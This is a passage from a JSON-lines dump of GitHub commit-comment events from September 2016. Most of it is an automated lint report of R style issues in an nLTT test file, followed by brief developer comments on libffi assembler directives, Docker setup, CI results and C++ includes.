tabs.**\n```r\n​\t\tML2[[1]],\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:30:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ttolerance = 0.001\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:30:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L30) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcolMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:30:77:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcolMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                           ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:30:90:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcolMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                        ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:30:104:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcolMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                                      ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:31:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:33:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_equal( #compare jumps in log space with jumps in normal space, should yield similar results\n^\n```\n[tests/testthat/test_mcmc_nltt.R:34:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcolMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:35:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcolMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(FALSE,FALSE),iterations=10000,burnin=1000,thinning=1,sigma=0.01))[[1]],\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:35:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L35) *style:* **lines should not be more than 80 characters.**\n```r\n​\texpect_equal( #compare jumps in log space with jumps in normal space, should yield similar results\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:36:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ttolerance = 0.001\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:36:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L36) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcolMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:36:77:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcolMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                           ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:36:90:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcolMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                        ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:36:104:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcolMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                                      ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:37:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L37) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:37:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L37) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcolMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(FALSE,FALSE),iterations=10000,burnin=1000,thinning=1,sigma=0.01))[[1]],\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:37:48:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L37) *style:* **Commas should always have a space after.**\n```r\n​\t\tcolMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(FALSE,FALSE),iterations=10000,burnin=1000,thinning=1,sigma=0.01))[[1]],\n                                               ^\n```\n[tests/testthat/test_mcmc_nltt.R:37:79:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcolMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(FALSE,FALSE),iterations=10000,burnin=1000,thinning=1,sigma=0.01))[[1]],\n                                                                             ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:37:92:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcolMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(FALSE,FALSE),iterations=10000,burnin=1000,thinning=1,sigma=0.01))[[1]],\n                                                                                          ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:37:106:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcolMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(FALSE,FALSE),iterations=10000,burnin=1000,thinning=1,sigma=0.01))[[1]],\n                                                                                                        ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:45:11:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L45) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n         ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:45:35:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L45) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                 ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:45:43:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L45) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                         ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:45:50:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L45) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:45:61:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L45) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                           ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:45:68:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L45) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                                  ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:46:11:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n         ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:46:35:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                 ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:46:43:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                         ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:46:50:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:46:61:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                           ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:46:68:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                                  ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:48:15:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\tLL_BD <- function(params, phy) {\n             ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:49:21:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tlnl <- TESS::tess.likelihood(phy[[1]], lambda = params[1], mu = params[2],\n                   ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:49:63:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tlnl <- TESS::tess.likelihood(phy[[1]], lambda = params[1], mu = params[2],\n                                                             ~^\n```\n[tests/testthat/test_mcmc_nltt.R:51:24:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t \tprior1 <- dunif( params[1], 0, 100, log = TRUE)\n                      ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:52:24:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​\t \tprior2 <- dunif( params[2], 0, 100, log = TRUE)\n                      ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:53:28:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L53) *style:* **Put spaces around all infix operators.**\n```r\n​\t \treturn(lnl + prior1 + prior2)\n                          ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:57:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L57) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tmcmc_nltt(q,LL_BD,c(1,0.0),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:57:67:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tmcmc_nltt(q,LL_BD,c(1,0.0),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                 ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:57:80:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tmcmc_nltt(q,LL_BD,c(1,0.0),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                              ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:57:94:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tmcmc_nltt(q,LL_BD,c(1,0.0),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                                            ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:62:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L62) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tmcmc_nltt(42,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:62:69:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L62) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tmcmc_nltt(42,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                   ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:62:82:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L62) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tmcmc_nltt(42,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                                ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:62:96:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L62) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tmcmc_nltt(42,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                                              ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:67:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L67) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tv <- mcmc_nltt(p,LL_BD,c(1,-1),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:67:19:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L67) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tv <- mcmc_nltt(p,LL_BD,c(1,-1),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                 ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:67:34:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L67) *style:* **Commas should always have a space after.**\n```r\n​\t\tv <- mcmc_nltt(p,LL_BD,c(1,-1),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                 ^\n```\n[tests/testthat/test_mcmc_nltt.R:67:71:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L67) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tv <- mcmc_nltt(p,LL_BD,c(1,-1),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                     ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:67:84:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L67) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tv <- mcmc_nltt(p,LL_BD,c(1,-1),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                                  ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:67:98:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L67) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tv <- mcmc_nltt(p,LL_BD,c(1,-1),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                                                ~^~\n```"}},"created_at":"2016-09-14T11:11:03Z"}
{"id":"4561300447","type":"CommitCommentEvent","actor":{"login":"claziss"},"repo":{"name":"dr-hannibal/libffi"},"payload":{"comment":{"id":19016987,"position":21,"line":55,"path":"src/arc/arcompact.S","commit_id":"4b45c8a352cc8c0432776e4e591560710bacd773","created_at":"2016-09-14T11:11:14Z","updated_at":"2016-09-14T11:11:14Z","body":"You forgot to inform about r4: .cfi_offset r4"}},"created_at":"2016-09-14T11:11:14Z"}
{"id":"4561300790","type":"CommitCommentEvent","actor":{"login":"beaylott"},"repo":{"name":"emoncms/emoncms-docker"},"payload":{"comment":{"id":19016988,"position":18,"line":35,"path":"Dockerfile","commit_id":"ce8232822b7b1dc29d4ef802306f49f7a938401a","created_at":"2016-09-14T11:11:18Z","updated_at":"2016-09-14T11:11:18Z","body":"speeds up builds on rpi"}},"created_at":"2016-09-14T11:11:18Z"}
{"id":"4561303245","type":"CommitCommentEvent","actor":{"login":"claziss"},"repo":{"name":"dr-hannibal/libffi"},"payload":{"comment":{"id":19016997,"position":12,"line":46,"path":"src/arc/arcompact.S","commit_id":"4b45c8a352cc8c0432776e4e591560710bacd773","created_at":"2016-09-14T11:11:55Z","updated_at":"2016-09-14T11:11:55Z","body":"Is assembler accepts this format? I thought you need to write like .cfi_startproc"}},"created_at":"2016-09-14T11:11:55Z"}
{"id":"4561303652","type":"CommitCommentEvent","actor":{"login":"SriPillai"},"repo":{"name":"NikhilGumulwar/TestApplication"},"payload":{"comment":{"id":19016998,"position":null,"line":null,"path":null,"commit_id":"1beed315c36f1b15c0f159bb32c1d74095cb71c1","created_at":"2016-09-14T11:12:02Z","updated_at":"2016-09-14T11:12:02Z","body":"Its correct!!!"}},"created_at":"2016-09-14T11:12:02Z"}
{"id":"4561303828","type":"CommitCommentEvent","actor":{"login":"phccc"},"repo":{"name":"phccc/testprj"},"payload":{"comment":{"id":19016999,"position":null,"line":null,"path":null,"commit_id":"507b509b5756b925144542e4bcc3f6bbd2d45d8b","created_at":"2016-09-14T11:12:03Z","updated_at":"2016-09-14T11:12:03Z","body":"# what a stupid code!\r\n# and nobody loves you"}},"created_at":"2016-09-14T11:12:03Z"}
{"id":"4561303911","type":"CommitCommentEvent","actor":{"login":"bukka"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":19017000,"position":null,"line":null,"path":null,"commit_id":"acc574d76b60d23b48f8fa561084eb859c2e0766","created_at":"2016-09-14T11:12:04Z","updated_at":"2016-09-14T11:12:04Z","body":"Makes sense. I think I got confused because of the master and have been probably doing it wrong. Sorry... I will fix recent NEWS with my latest fix though"}},"created_at":"2016-09-14T11:12:04Z"}
{"id":"4561304580","type":"CommitCommentEvent","actor":{"login":"naomipol"},"repo":{"name":"shulamyt/shareMyBooks"},"payload":{"comment":{"id":19017006,"position":8,"line":9,"path":"server/persistence/loanPersistence.js","commit_id":"8dd1d5fcb743ca589ed78c202c723f5576178fca","created_at":"2016-09-14T11:12:14Z","updated_at":"2016-09-14T11:12:14Z","body":"`accepted=true`"}},"created_at":"2016-09-14T11:12:14Z"}
{"id":"4561305278","type":"CommitCommentEvent","actor":{"login":"beaylott"},"repo":{"name":"emoncms/emoncms-docker"},"payload":{"comment":{"id":19017010,"position":1,"line":1,"path":"supervisord.conf","commit_id":"ce8232822b7b1dc29d4ef802306f49f7a938401a","created_at":"2016-09-14T11:12:23Z","updated_at":"2016-09-14T11:12:23Z","body":"supervisord conf... good way of managing runtime behaviour... alternative is ENTRYPOINT or chained CMD but these dont handle  signals well whereas supervisord has this all baked in.  "}},"created_at":"2016-09-14T11:12:23Z"}
{"id":"4561305641","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19017012,"position":null,"line":null,"path":null,"commit_id":"23ee489d2e5b17f1b1cec48f1bc0e4bbb5b30b6e","created_at":"2016-09-14T11:12:27Z","updated_at":"2016-09-14T11:12:27Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 993](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13232&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:09:28"}},"created_at":"2016-09-14T11:12:27Z"}
{"id":"4561305781","type":"CommitCommentEvent","actor":{"login":"NikhilGumulwar"},"repo":{"name":"NikhilGumulwar/TestApplication"},"payload":{"comment":{"id":19017013,"position":1,"line":8,"path":"source/Program.cs","commit_id":"1beed315c36f1b15c0f159bb32c1d74095cb71c1","created_at":"2016-09-14T11:12:29Z","updated_at":"2016-09-14T11:12:29Z","body":"its okay\r\n"}},"created_at":"2016-09-14T11:12:29Z"}
{"id":"4561306095","type":"CommitCommentEvent","actor":{"login":"iArnold"},"repo":{"name":"qtxie/red"},"payload":{"comment":{"id":19017015,"position":null,"line":null,"path":null,"commit_id":"6b8af314d5ad807d4912d5adb79c009d973e2046","created_at":"2016-09-14T11:12:34Z","updated_at":"2016-09-14T11:12:34Z","body":"A FIX not a FEAT? ;-)"}},"created_at":"2016-09-14T11:12:34Z"}
{"id":"4561306934","type":"CommitCommentEvent","actor":{"login":"claziss"},"repo":{"name":"dr-hannibal/libffi"},"payload":{"comment":{"id":19017016,"position":23,"line":57,"path":"src/arc/arcompact.S","commit_id":"4b45c8a352cc8c0432776e4e591560710bacd773","created_at":"2016-09-14T11:12:45Z","updated_at":"2016-09-14T11:12:45Z","body":".cfi_offset 3, -16"}},"created_at":"2016-09-14T11:12:45Z"}
{"id":"4561309366","type":"CommitCommentEvent","actor":{"login":"claziss"},"repo":{"name":"dr-hannibal/libffi"},"payload":{"comment":{"id":19017022,"position":25,"line":59,"path":"src/arc/arcompact.S","commit_id":"4b45c8a352cc8c0432776e4e591560710bacd773","created_at":"2016-09-14T11:13:21Z","updated_at":"2016-09-14T11:13:21Z","body":".cfi_offset 5, -20"}},"created_at":"2016-09-14T11:13:21Z"}
{"id":"4561311667","type":"CommitCommentEvent","actor":{"login":"claziss"},"repo":{"name":"dr-hannibal/libffi"},"payload":{"comment":{"id":19017025,"position":27,"line":61,"path":"src/arc/arcompact.S","commit_id":"4b45c8a352cc8c0432776e4e591560710bacd773","created_at":"2016-09-14T11:13:56Z","updated_at":"2016-09-14T11:13:56Z","body":".cfi_offset 2, -24"}},"created_at":"2016-09-14T11:13:56Z"}
{"id":"4561313074","type":"CommitCommentEvent","actor":{"login":"SriPillai"},"repo":{"name":"NikhilGumulwar/TestApplication"},"payload":{"comment":{"id":19017029,"position":4,"line":11,"path":"source/Program.cs","commit_id":"1beed315c36f1b15c0f159bb32c1d74095cb71c1","created_at":"2016-09-14T11:14:18Z","updated_at":"2016-09-14T11:14:18Z","body":"This line is correct"}},"created_at":"2016-09-14T11:14:18Z"}
{"id":"4561314964","type":"CommitCommentEvent","actor":{"login":"dr-hannibal"},"repo":{"name":"dr-hannibal/libffi"},"payload":{"comment":{"id":19017034,"position":12,"line":46,"path":"src/arc/arcompact.S","commit_id":"4b45c8a352cc8c0432776e4e591560710bacd773","created_at":"2016-09-14T11:14:46Z","updated_at":"2016-09-14T11:14:46Z","body":"It is a macro from `ffi_cfi.h`."}},"created_at":"2016-09-14T11:14:46Z"}
{"id":"4561315444","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19017038,"position":5,"line":420,"path":"src/utils/polygon.cpp","commit_id":"26757ef8020f1d3d01e23348bab5cefb332cfb47","created_at":"2016-09-14T11:14:53Z","updated_at":"2016-09-14T11:14:53Z","body":"You're not doing any `#include<math.h>` in this file."}},"created_at":"2016-09-14T11:14:53Z"}
